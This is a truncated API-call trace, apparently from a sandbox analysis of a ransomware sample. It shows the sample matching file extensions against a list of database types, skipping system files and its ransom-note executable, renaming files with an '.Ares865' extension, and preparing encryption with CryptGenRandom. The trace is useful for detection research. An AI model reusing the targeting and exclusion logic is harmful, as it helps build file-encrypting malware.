[0065.334] lstrlenW (lpString="avhd") returned 4 [0065.334] lstrcmpiW (lpString1=".ini", lpString2="avhd") returned -1 [0065.334] lstrlenW (lpString="db") returned 2 [0065.334] lstrcmpiW (lpString1="ni", lpString2="db") returned 1 [0065.334] lstrlenW (lpString="db2") returned 3 [0065.334] lstrcmpiW (lpString1="ini", lpString2="db2") returned 1 [0065.334] lstrlenW (lpString="db3") returned 3 [0065.334] lstrcmpiW (lpString1="ini", lpString2="db3") returned 1 [0065.334] lstrlenW (lpString="dbf") returned 3 [0065.334] lstrcmpiW (lpString1="ini", lpString2="dbf") returned 1 [0065.334] lstrlenW (lpString="mdf") returned 3 [0065.334] lstrcmpiW (lpString1="ini", lpString2="mdf") returned -1 [0065.334] lstrlenW (lpString="mdb") returned 3 [0065.334] lstrcmpiW (lpString1="ini", lpString2="mdb") returned -1 [0065.334] lstrlenW (lpString="sql") returned 3 [0065.334] lstrcmpiW (lpString1="ini", lpString2="sql") returned -1 [0065.334] lstrlenW (lpString="sqlite") returned 6 [0065.334] lstrcmpiW (lpString1="op.ini", lpString2="sqlite") returned -1 [0065.334] lstrlenW (lpString="sqlite3") returned 7 [0065.335] lstrcmpiW (lpString1="top.ini", lpString2="sqlite3") returned 1 [0065.335] lstrlenW (lpString="sqlitedb") returned 8 [0065.335] lstrcmpiW (lpString1="ktop.ini", lpString2="sqlitedb") returned -1 [0065.335] lstrlenW (lpString="xml") returned 3 [0065.335] lstrcmpiW (lpString1="ini", lpString2="xml") returned -1 [0065.335] lstrlenW (lpString="$er") returned 3 [0065.335] lstrcmpiW (lpString1="ini", lpString2="$er") returned 1 [0065.335] lstrlenW (lpString="4dd") returned 3 [0065.335] lstrcmpiW (lpString1="ini", lpString2="4dd") returned 1 [0065.335] lstrlenW (lpString="4dl") returned 3 [0065.335] lstrcmpiW (lpString1="ini", lpString2="4dl") returned 1 [0065.335] lstrlenW (lpString="^^^") returned 3 [0065.335] lstrcmpiW (lpString1="ini", lpString2="^^^") returned 1 [0065.335] lstrlenW (lpString="abs") returned 3 [0065.335] lstrcmpiW (lpString1="ini", lpString2="abs") returned 1 [0065.335] lstrlenW (lpString="abx") returned 3 [0065.335] lstrcmpiW (lpString1="ini", lpString2="abx") returned 1 [0065.335] lstrlenW (lpString="accdb") returned 5 [0065.335] lstrcmpiW (lpString1="p.ini", lpString2="accdb") returned 1 [0065.335] lstrlenW (lpString="accdc") returned 5 [0065.335] lstrcmpiW (lpString1="p.ini", lpString2="accdc") returned 1 [0065.335] lstrlenW (lpString="accde") returned 5 [0065.335] lstrcmpiW (lpString1="p.ini", lpString2="accde") returned 1 [0065.335] lstrlenW (lpString="accdr") returned 5 [0065.335] lstrcmpiW (lpString1="p.ini", lpString2="accdr") returned 1 [0065.335] lstrlenW (lpString="accdt") returned 5 [0065.335] lstrcmpiW (lpString1="p.ini", lpString2="accdt") returned 1 [0065.335] lstrlenW (lpString="accdw") returned 5 [0065.335] lstrcmpiW (lpString1="p.ini", lpString2="accdw") returned 1 [0065.335] lstrlenW (lpString="accft") returned 5 [0065.335] lstrcmpiW (lpString1="p.ini", lpString2="accft") returned 1 [0065.335] lstrlenW (lpString="adb") returned 3 [0065.335] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0065.335] lstrlenW (lpString="adb") returned 3 [0065.335] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0065.335] lstrlenW (lpString="ade") returned 3 [0065.335] lstrcmpiW (lpString1="ini", lpString2="ade") returned 1 [0065.336] lstrlenW (lpString="adf") returned 3 [0065.336] lstrcmpiW (lpString1="ini", lpString2="adf") returned 1 [0065.336] lstrlenW (lpString="adn") returned 3 [0065.336] lstrcmpiW (lpString1="ini", lpString2="adn") returned 1 [0065.336] lstrlenW (lpString="adp") returned 3 [0065.336] lstrcmpiW (lpString1="ini", lpString2="adp") returned 1 [0065.336] lstrlenW (lpString="alf") returned 3 [0065.336] lstrcmpiW (lpString1="ini", lpString2="alf") returned 1 [0065.336] lstrlenW (lpString="ask") returned 3 [0065.336] lstrcmpiW (lpString1="ini", lpString2="ask") returned 1 [0065.336] lstrlenW (lpString="btr") returned 3 [0065.336] lstrcmpiW (lpString1="ini", lpString2="btr") returned 1 [0065.336] lstrlenW (lpString="cat") returned 3 [0065.336] lstrcmpiW (lpString1="ini", lpString2="cat") returned 1 [0065.336] lstrlenW (lpString="cdb") returned 3 [0065.336] lstrcmpiW (lpString1="ini", lpString2="cdb") returned 1 [0065.336] lstrlenW (lpString="ckp") returned 3 [0065.336] lstrcmpiW (lpString1="ini", lpString2="ckp") returned 1 [0065.336] lstrlenW (lpString="cma") returned 3 [0065.336] lstrcmpiW (lpString1="ini", lpString2="cma") returned 1 [0065.336] lstrlenW (lpString="cpd") returned 3 [0065.336] lstrcmpiW (lpString1="ini", lpString2="cpd") returned 1 [0065.336] lstrlenW (lpString="dacpac") returned 6 [0065.336] lstrcmpiW (lpString1="op.ini", lpString2="dacpac") returned 1 [0065.336] lstrlenW (lpString="dad") returned 3 [0065.336] lstrcmpiW (lpString1="ini", lpString2="dad") returned 1 [0065.336] lstrlenW (lpString="dadiagrams") returned 10 [0065.336] lstrcmpiW (lpString1="esktop.ini", lpString2="dadiagrams") returned 1 [0065.336] lstrlenW (lpString="daschema") returned 8 [0065.336] lstrcmpiW (lpString1="ktop.ini", lpString2="daschema") returned 1 [0065.336] lstrlenW (lpString="db-journal") returned 10 [0065.336] lstrcmpiW (lpString1="esktop.ini", lpString2="db-journal") returned 1 [0065.336] lstrlenW (lpString="db-shm") returned 6 [0065.336] lstrcmpiW (lpString1="op.ini", lpString2="db-shm") returned 1 [0065.336] lstrlenW (lpString="db-wal") returned 6 [0065.336] lstrcmpiW (lpString1="op.ini", lpString2="db-wal") returned 1 [0065.336] lstrlenW (lpString="dbc") returned 3 [0065.337] lstrcmpiW (lpString1="ini", lpString2="dbc") returned 1 [0065.337] lstrlenW (lpString="dbs") returned 3 [0065.337] lstrcmpiW (lpString1="ini", lpString2="dbs") returned 1 [0065.337] lstrlenW (lpString="dbt") returned 3 [0065.337] lstrcmpiW (lpString1="ini", lpString2="dbt") returned 1 [0065.337] lstrlenW (lpString="dbv") returned 3 [0065.337] lstrcmpiW (lpString1="ini", lpString2="dbv") returned 1 [0065.337] lstrlenW (lpString="dbx") returned 3 [0065.337] lstrcmpiW (lpString1="ini", lpString2="dbx") returned 1 [0065.337] lstrlenW (lpString="dcb") returned 3 [0065.337] lstrcmpiW (lpString1="ini", lpString2="dcb") returned 1 [0065.337] lstrlenW (lpString="dct") returned 3 [0065.337] lstrcmpiW (lpString1="ini", lpString2="dct") returned 1 [0065.337] lstrlenW (lpString="dcx") returned 3 [0065.337] lstrcmpiW (lpString1="ini", lpString2="dcx") returned 1 [0065.337] lstrlenW (lpString="ddl") returned 3 [0065.337] lstrcmpiW (lpString1="ini", lpString2="ddl") returned 1 [0065.337] lstrlenW (lpString="dlis") returned 4 [0065.337] lstrcmpiW (lpString1=".ini", lpString2="dlis") returned -1 [0065.337] lstrlenW (lpString="dp1") returned 3 [0065.337] lstrcmpiW (lpString1="ini", lpString2="dp1") returned 1 [0065.337] lstrlenW (lpString="dqy") returned 3 [0065.337] lstrcmpiW (lpString1="ini", lpString2="dqy") returned 1 [0065.337] lstrlenW (lpString="dsk") returned 3 [0065.337] lstrcmpiW (lpString1="ini", lpString2="dsk") returned 1 [0065.337] lstrlenW (lpString="dsn") returned 3 [0065.337] lstrcmpiW (lpString1="ini", lpString2="dsn") returned 1 [0065.337] lstrlenW (lpString="dtsx") returned 4 [0065.337] lstrcmpiW (lpString1=".ini", lpString2="dtsx") returned -1 [0065.337] lstrlenW (lpString="dxl") returned 3 [0065.337] lstrcmpiW (lpString1="ini", lpString2="dxl") returned 1 [0065.337] lstrlenW (lpString="eco") returned 3 [0065.337] lstrcmpiW (lpString1="ini", lpString2="eco") returned 1 [0065.337] lstrlenW (lpString="ecx") returned 3 [0065.337] lstrcmpiW (lpString1="ini", lpString2="ecx") returned 1 [0065.337] lstrlenW (lpString="edb") returned 3 [0065.338] lstrcmpiW (lpString1="ini", lpString2="edb") returned 1 [0065.338] lstrlenW (lpString="epim") returned 4 [0065.338] lstrcmpiW (lpString1=".ini", lpString2="epim") returned -1 [0065.338] lstrlenW (lpString="fcd") returned 3 [0065.338] lstrcmpiW (lpString1="ini", lpString2="fcd") returned 1 [0065.338] lstrlenW (lpString="fdb") returned 3 [0065.338] lstrcmpiW (lpString1="ini", lpString2="fdb") returned 1 [0065.338] lstrlenW (lpString="fic") returned 3 [0065.338] lstrcmpiW (lpString1="ini", lpString2="fic") returned 1 [0065.338] lstrlenW (lpString="flexolibrary") returned 12 [0065.338] lstrlenW (lpString="fm5") returned 3 [0065.338] lstrcmpiW (lpString1="ini", lpString2="fm5") returned 1 [0065.338] lstrlenW (lpString="fmp") returned 3 [0065.338] lstrcmpiW (lpString1="ini", lpString2="fmp") returned 1 [0065.338] lstrlenW (lpString="fmp12") returned 5 [0065.338] lstrcmpiW (lpString1="p.ini", lpString2="fmp12") returned 1 [0065.338] lstrlenW (lpString="fmpsl") returned 5 [0065.338] lstrcmpiW (lpString1="p.ini", lpString2="fmpsl") returned 1 [0065.338] lstrlenW (lpString="fol") returned 3 [0065.338] lstrcmpiW (lpString1="ini", lpString2="fol") returned 1 [0065.338] lstrlenW (lpString="fp3") returned 3 [0065.338] lstrcmpiW (lpString1="ini", lpString2="fp3") returned 1 [0065.338] lstrlenW (lpString="fp4") returned 3 [0065.338] lstrcmpiW (lpString1="ini", lpString2="fp4") returned 1 [0065.338] lstrlenW (lpString="fp5") returned 3 [0065.338] lstrcmpiW (lpString1="ini", lpString2="fp5") returned 1 [0065.338] lstrlenW (lpString="fp7") returned 3 [0065.338] lstrcmpiW (lpString1="ini", lpString2="fp7") returned 1 [0065.338] lstrlenW (lpString="fpt") returned 3 [0065.338] lstrcmpiW (lpString1="ini", lpString2="fpt") returned 1 [0065.338] lstrlenW (lpString="frm") returned 3 [0065.338] lstrcmpiW (lpString1="ini", lpString2="frm") returned 1 [0065.338] lstrlenW (lpString="gdb") returned 3 [0065.338] lstrcmpiW (lpString1="ini", lpString2="gdb") returned 1 [0065.338] lstrlenW (lpString="gdb") returned 3 [0065.338] lstrcmpiW (lpString1="ini", lpString2="gdb") returned 1 [0065.339] lstrlenW (lpString="grdb") returned 4 [0065.339] lstrcmpiW (lpString1=".ini", lpString2="grdb") returned -1 [0065.339] lstrlenW (lpString="gwi") returned 3 [0065.339] lstrcmpiW (lpString1="ini", lpString2="gwi") returned 1 [0065.339] lstrlenW (lpString="hdb") returned 3 [0065.339] lstrcmpiW (lpString1="ini", lpString2="hdb") returned 1 [0065.339] lstrlenW (lpString="his") returned 3 [0065.339] lstrcmpiW (lpString1="ini", lpString2="his") returned 1 [0065.339] lstrlenW (lpString="ib") returned 2 [0065.339] lstrcmpiW (lpString1="ni", lpString2="ib") returned 1 [0065.339] lstrlenW (lpString="idb") returned 3 [0065.339] lstrcmpiW (lpString1="ini", lpString2="idb") returned 1 [0065.339] lstrlenW (lpString="ihx") returned 3 [0065.339] lstrcmpiW (lpString1="ini", lpString2="ihx") returned 1 [0065.339] lstrlenW (lpString="itdb") returned 4 [0065.339] lstrcmpiW (lpString1=".ini", lpString2="itdb") returned -1 [0065.339] lstrlenW (lpString="itw") returned 3 [0065.339] lstrcmpiW (lpString1="ini", lpString2="itw") returned -1 [0065.339] lstrlenW (lpString="jet") returned 3 [0065.339] lstrcmpiW (lpString1="ini", lpString2="jet") returned -1 [0065.339] lstrlenW (lpString="jtx") returned 3 [0065.339] lstrcmpiW (lpString1="ini", lpString2="jtx") returned -1 [0065.339] lstrlenW (lpString="kdb") returned 3 [0065.339] lstrcmpiW (lpString1="ini", lpString2="kdb") returned -1 [0065.339] lstrlenW (lpString="kexi") returned 4 [0065.339] lstrcmpiW (lpString1=".ini", lpString2="kexi") returned -1 [0065.339] lstrlenW (lpString="kexic") returned 5 [0065.339] lstrcmpiW (lpString1="p.ini", lpString2="kexic") returned 1 [0065.339] lstrlenW (lpString="kexis") returned 5 [0065.339] lstrcmpiW (lpString1="p.ini", lpString2="kexis") returned 1 [0065.339] lstrlenW (lpString="lgc") returned 3 [0065.339] lstrcmpiW (lpString1="ini", lpString2="lgc") returned -1 [0065.339] lstrlenW (lpString="lwx") returned 3 [0065.339] lstrcmpiW (lpString1="ini", lpString2="lwx") returned -1 [0065.339] lstrlenW (lpString="maf") returned 3 [0065.339] lstrcmpiW (lpString1="ini", lpString2="maf") returned -1 [0065.339] lstrlenW (lpString="maq") returned 3 [0065.339] lstrcmpiW (lpString1="ini", lpString2="maq") returned -1 [0065.340] lstrlenW (lpString="mar") returned 3 [0065.340] lstrcmpiW (lpString1="ini", lpString2="mar") returned -1 [0065.340] lstrlenW (lpString="marshal") returned 7 [0065.340] lstrcmpiW (lpString1="top.ini", lpString2="marshal") returned 1 [0065.340] lstrlenW (lpString="mas") returned 3 [0065.340] lstrcmpiW (lpString1="ini", lpString2="mas") returned -1 [0065.340] lstrlenW (lpString="mav") returned 3 [0065.340] lstrcmpiW (lpString1="ini", lpString2="mav") returned -1 [0065.340] lstrlenW (lpString="maw") returned 3 [0065.340] lstrcmpiW (lpString1="ini", lpString2="maw") returned -1 [0065.340] lstrlenW (lpString="mdbhtml") returned 7 [0065.340] lstrcmpiW (lpString1="top.ini", lpString2="mdbhtml") returned 1 [0065.340] lstrlenW (lpString="mdn") returned 3 [0065.340] lstrcmpiW (lpString1="ini", lpString2="mdn") returned -1 [0065.340] lstrlenW (lpString="mdt") returned 3 [0065.340] lstrcmpiW (lpString1="ini", lpString2="mdt") returned -1 [0065.340] lstrlenW (lpString="mfd") returned 3 [0065.340] lstrcmpiW (lpString1="ini", lpString2="mfd") returned -1 [0065.340] lstrlenW (lpString="mpd") returned 3 [0065.340] lstrcmpiW (lpString1="ini", lpString2="mpd") returned -1 [0065.340] lstrlenW (lpString="mrg") returned 3 [0065.340] lstrcmpiW (lpString1="ini", lpString2="mrg") returned -1 [0065.340] lstrlenW (lpString="mud") returned 3 [0065.340] lstrcmpiW (lpString1="ini", lpString2="mud") returned -1 [0065.340] lstrlenW (lpString="mwb") returned 3 [0065.340] lstrcmpiW (lpString1="ini", lpString2="mwb") returned -1 [0065.340] lstrlenW (lpString="myd") returned 3 [0065.340] lstrcmpiW (lpString1="ini", lpString2="myd") returned -1 [0065.340] lstrlenW (lpString="ndf") returned 3 [0065.340] lstrcmpiW (lpString1="ini", lpString2="ndf") returned -1 [0065.340] lstrlenW (lpString="nnt") returned 3 [0065.340] lstrcmpiW (lpString1="ini", lpString2="nnt") returned -1 [0065.340] lstrlenW (lpString="nrmlib") returned 6 [0065.340] lstrcmpiW (lpString1="op.ini", lpString2="nrmlib") returned 1 [0065.340] lstrlenW (lpString="ns2") returned 3 [0065.340] lstrcmpiW (lpString1="ini", lpString2="ns2") returned -1 [0065.340] lstrlenW (lpString="ns3") returned 3 [0065.341] lstrcmpiW (lpString1="ini", lpString2="ns3") returned -1 [0065.341] lstrlenW (lpString="ns4") returned 3 [0065.341] lstrcmpiW (lpString1="ini", lpString2="ns4") returned -1 [0065.341] lstrlenW (lpString="nsf") returned 3 [0065.341] lstrcmpiW (lpString1="ini", lpString2="nsf") returned -1 [0065.341] lstrlenW (lpString="nv") returned 2 [0065.341] lstrcmpiW (lpString1="ni", lpString2="nv") returned -1 [0065.341] lstrlenW (lpString="nv2") returned 3 [0065.341] lstrcmpiW (lpString1="ini", lpString2="nv2") returned -1 [0065.341] lstrlenW (lpString="nwdb") returned 4 [0065.341] lstrcmpiW (lpString1=".ini", lpString2="nwdb") returned -1 [0065.341] lstrlenW (lpString="nyf") returned 3 [0065.341] lstrcmpiW (lpString1="ini", lpString2="nyf") returned -1 [0065.341] lstrlenW (lpString="odb") returned 3 [0065.341] lstrcmpiW (lpString1="ini", lpString2="odb") returned -1 [0065.341] lstrlenW (lpString="odb") returned 3 [0065.341] lstrcmpiW (lpString1="ini", lpString2="odb") returned -1 [0065.341] lstrlenW (lpString="oqy") returned 3 [0065.341] lstrcmpiW (lpString1="ini", lpString2="oqy") returned -1 [0065.341] lstrlenW (lpString="ora") returned 3 [0065.341] lstrcmpiW (lpString1="ini", lpString2="ora") returned -1 [0065.341] lstrlenW (lpString="orx") returned 3 [0065.341] lstrcmpiW (lpString1="ini", lpString2="orx") returned -1 [0065.341] lstrlenW (lpString="owc") returned 3 [0065.341] lstrcmpiW (lpString1="ini", lpString2="owc") returned -1 [0065.341] lstrlenW (lpString="p96") returned 3 [0065.341] lstrcmpiW (lpString1="ini", lpString2="p96") returned -1 [0065.341] lstrlenW (lpString="p97") returned 3 [0065.341] lstrcmpiW (lpString1="ini", lpString2="p97") returned -1 [0065.341] lstrlenW (lpString="pan") returned 3 [0065.341] lstrcmpiW (lpString1="ini", lpString2="pan") returned -1 [0065.341] lstrlenW (lpString="pdb") returned 3 [0065.341] lstrcmpiW (lpString1="ini", lpString2="pdb") returned -1 [0065.341] lstrlenW (lpString="pdm") returned 3 [0065.341] lstrcmpiW (lpString1="ini", lpString2="pdm") returned -1 [0065.341] lstrlenW (lpString="pnz") returned 3 [0065.341] lstrcmpiW (lpString1="ini", lpString2="pnz") returned -1 [0065.342] lstrlenW (lpString="qry") returned 3 [0065.342] lstrcmpiW (lpString1="ini", lpString2="qry") returned -1 [0065.342] lstrlenW (lpString="qvd") returned 3 [0065.342] lstrcmpiW (lpString1="ini", lpString2="qvd") returned -1 [0065.342] lstrlenW (lpString="rbf") returned 3 [0065.342] lstrcmpiW (lpString1="ini", lpString2="rbf") returned -1 [0065.342] lstrlenW (lpString="rctd") returned 4 [0065.342] lstrcmpiW (lpString1=".ini", lpString2="rctd") returned -1 [0065.342] lstrlenW (lpString="rod") returned 3 [0065.342] lstrcmpiW (lpString1="ini", lpString2="rod") returned -1 [0065.342] lstrlenW (lpString="rodx") returned 4 [0065.342] lstrcmpiW (lpString1=".ini", lpString2="rodx") returned -1 [0065.342] lstrlenW (lpString="rpd") returned 3 [0065.342] lstrcmpiW (lpString1="ini", lpString2="rpd") returned -1 [0065.342] lstrlenW (lpString="rsd") returned 3 [0065.342] lstrcmpiW (lpString1="ini", lpString2="rsd") returned -1 [0065.342] lstrlenW (lpString="sas7bdat") returned 8 [0065.342] lstrcmpiW (lpString1="ktop.ini", lpString2="sas7bdat") returned -1 [0065.342] lstrlenW (lpString="sbf") returned 3 [0065.342] lstrcmpiW (lpString1="ini", lpString2="sbf") returned -1 [0065.342] lstrlenW (lpString="scx") returned 3 [0065.342] lstrcmpiW (lpString1="ini", lpString2="scx") returned -1 [0065.342] lstrlenW (lpString="sdb") returned 3 [0065.342] lstrcmpiW (lpString1="ini", lpString2="sdb") returned -1 [0065.342] lstrlenW (lpString="sdc") returned 3 [0065.342] lstrcmpiW (lpString1="ini", lpString2="sdc") returned -1 [0065.342] lstrlenW (lpString="sdf") returned 3 [0065.342] lstrcmpiW (lpString1="ini", lpString2="sdf") returned -1 [0065.354] lstrlenW (lpString="sis") returned 3 [0065.354] lstrcmpiW (lpString1="ini", lpString2="sis") returned -1 [0065.354] lstrlenW (lpString="spq") returned 3 [0065.354] lstrcmpiW (lpString1="ini", lpString2="spq") returned -1 [0065.354] lstrlenW (lpString="te") returned 2 [0065.354] lstrcmpiW (lpString1="ni", lpString2="te") returned -1 [0065.354] lstrlenW (lpString="teacher") returned 7 [0065.354] lstrcmpiW (lpString1="top.ini", lpString2="teacher") returned 1 [0065.354] lstrlenW (lpString="tmd") returned 3 [0065.354] lstrcmpiW (lpString1="ini", lpString2="tmd") returned -1 [0065.354] lstrlenW (lpString="tps") returned 3 [0065.354] lstrcmpiW (lpString1="ini", lpString2="tps") returned -1 [0065.354] lstrlenW (lpString="trc") returned 3 [0065.354] lstrcmpiW (lpString1="ini", lpString2="trc") returned -1 [0065.354] lstrlenW (lpString="trc") returned 3 [0065.354] lstrcmpiW (lpString1="ini", lpString2="trc") returned -1 [0065.354] lstrlenW (lpString="trm") returned 3 [0065.354] lstrcmpiW (lpString1="ini", lpString2="trm") returned -1 [0065.354] lstrlenW (lpString="udb") returned 3 [0065.354] lstrcmpiW (lpString1="ini", lpString2="udb") returned -1 [0065.354] lstrlenW (lpString="udl") returned 3 [0065.354] lstrcmpiW (lpString1="ini", lpString2="udl") returned -1 [0065.354] lstrlenW (lpString="usr") returned 3 [0065.354] lstrcmpiW (lpString1="ini", lpString2="usr") returned -1 [0065.354] lstrlenW (lpString="v12") returned 3 [0065.354] lstrcmpiW (lpString1="ini", lpString2="v12") returned -1 [0065.354] lstrlenW (lpString="vis") returned 3 [0065.354] lstrcmpiW (lpString1="ini", lpString2="vis") returned -1 [0065.354] lstrlenW (lpString="vpd") returned 3 [0065.354] lstrcmpiW (lpString1="ini", lpString2="vpd") returned -1 [0065.355] lstrlenW (lpString="vvv") returned 3 [0065.355] lstrcmpiW (lpString1="ini", lpString2="vvv") returned -1 [0065.355] lstrlenW (lpString="wdb") returned 3 [0065.355] lstrcmpiW (lpString1="ini", lpString2="wdb") returned -1 [0065.355] lstrlenW (lpString="wmdb") returned 4 [0065.355] lstrcmpiW (lpString1=".ini", lpString2="wmdb") returned -1 [0065.355] lstrlenW (lpString="wrk") returned 3 [0065.355] lstrcmpiW (lpString1="ini", lpString2="wrk") returned -1 [0065.355] lstrlenW (lpString="xdb") returned 3 [0065.355] lstrcmpiW (lpString1="ini", lpString2="xdb") returned -1 [0065.355] lstrlenW (lpString="xld") returned 3 [0065.355] lstrcmpiW (lpString1="ini", lpString2="xld") returned -1 [0065.355] lstrlenW (lpString="xmlff") returned 5 [0065.355] lstrcmpiW (lpString1="p.ini", lpString2="xmlff") returned -1 [0065.355] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\D68G7BIJ\\desktop.ini.Ares865") returned 87 [0065.355] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\D68G7BIJ\\desktop.ini" (normalized: "c:\\users\\default user\\local settings\\microsoft\\feeds cache\\d68g7bij\\desktop.ini"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\D68G7BIJ\\desktop.ini.Ares865" (normalized: "c:\\users\\default user\\local settings\\microsoft\\feeds cache\\d68g7bij\\desktop.ini.ares865"), dwFlags=0x1) returned 1 [0065.357] CreateFileW (lpFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\D68G7BIJ\\desktop.ini.Ares865" (normalized: "c:\\users\\default user\\local settings\\microsoft\\feeds cache\\d68g7bij\\desktop.ini.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0065.357] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=67) returned 1 [0065.357] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0065.358] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3238 [0065.358] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0065.358] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0065.359] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0065.359] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0065.359] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x350, lpName=0x0) returned 0x118 [0065.361] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x350) returned 0x190000 [0065.361] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0065.362] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0065.362] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0065.362] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d32b0 [0065.362] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d32b0 | out: hHeap=0x2b0000) returned 1 [0065.362] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0065.362] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0065.362] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0065.362] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0065.363] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9b60 [0065.363] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0065.363] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9b60 | out: hHeap=0x2b0000) returned 1 [0065.363] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0065.363] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0065.363] CloseHandle (hObject=0x118) returned 1 [0065.363] CloseHandle (hObject=0x164) returned 1 [0065.363] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3238 | out: hHeap=0x2b0000) returned 1 [0065.363] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0065.363] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0065.363] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x668c5a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x668c5a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xff06fa11, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="fwlink[1]", cAlternateFileName="FWLINK~1")) returned 1 [0065.363] lstrcmpiW (lpString1="fwlink[1]", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.363] lstrcmpiW (lpString1="fwlink[1]", lpString2="aoldtz.exe") returned 1 [0065.363] lstrcmpiW (lpString1="fwlink[1]", lpString2=".") returned 1 [0065.363] lstrcmpiW (lpString1="fwlink[1]", lpString2="..") returned 1 [0065.363] lstrcmpiW (lpString1="fwlink[1]", lpString2="windows") returned -1 [0065.364] lstrcmpiW (lpString1="fwlink[1]", lpString2="bootmgr") returned 1 [0065.364] lstrcmpiW (lpString1="fwlink[1]", lpString2="temp") returned -1 [0065.364] lstrcmpiW (lpString1="fwlink[1]", lpString2="pagefile.sys") returned -1 [0065.364] lstrcmpiW (lpString1="fwlink[1]", lpString2="boot") returned 1 [0065.364] lstrcmpiW (lpString1="fwlink[1]", lpString2="ids.txt") returned -1 [0065.364] lstrcmpiW (lpString1="fwlink[1]", lpString2="ntuser.dat") returned -1 [0065.364] lstrcmpiW (lpString1="fwlink[1]", lpString2="perflogs") returned -1 [0065.364] lstrcmpiW (lpString1="fwlink[1]", lpString2="MSBuild") returned -1 [0065.364] lstrlenW (lpString="fwlink[1]") returned 9 [0065.364] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\D68G7BIJ\\desktop.ini") returned 79 [0065.364] lstrcpyW (in: lpString1=0x2cce488, lpString2="fwlink[1]" | out: lpString1="fwlink[1]") returned="fwlink[1]" [0065.364] lstrlenW (lpString="fwlink[1]") returned 9 [0065.364] lstrlenW (lpString="Ares865") returned 7 [0065.364] lstrcmpiW (lpString1="link[1]", lpString2="Ares865") returned 1 [0065.364] lstrlenW (lpString=".dll") returned 4 [0065.364] lstrcmpiW (lpString1="fwlink[1]", lpString2=".dll") returned 1 [0065.364] lstrlenW (lpString=".lnk") returned 4 [0065.364] lstrcmpiW (lpString1="fwlink[1]", lpString2=".lnk") returned 1 [0065.364] lstrlenW (lpString=".ini") returned 4 [0065.364] lstrcmpiW (lpString1="fwlink[1]", lpString2=".ini") returned 1 [0065.364] lstrlenW (lpString=".sys") returned 4 [0065.364] lstrcmpiW (lpString1="fwlink[1]", lpString2=".sys") returned 1 [0065.364] lstrlenW (lpString="fwlink[1]") returned 9 [0065.364] lstrlenW (lpString="bak") returned 3 [0065.364] lstrcmpiW (lpString1="[1]", lpString2="bak") returned -1 [0065.364] lstrlenW (lpString="ba_") returned 3 [0065.364] lstrcmpiW (lpString1="[1]", lpString2="ba_") returned -1 [0065.364] lstrlenW (lpString="dbb") returned 3 [0065.364] 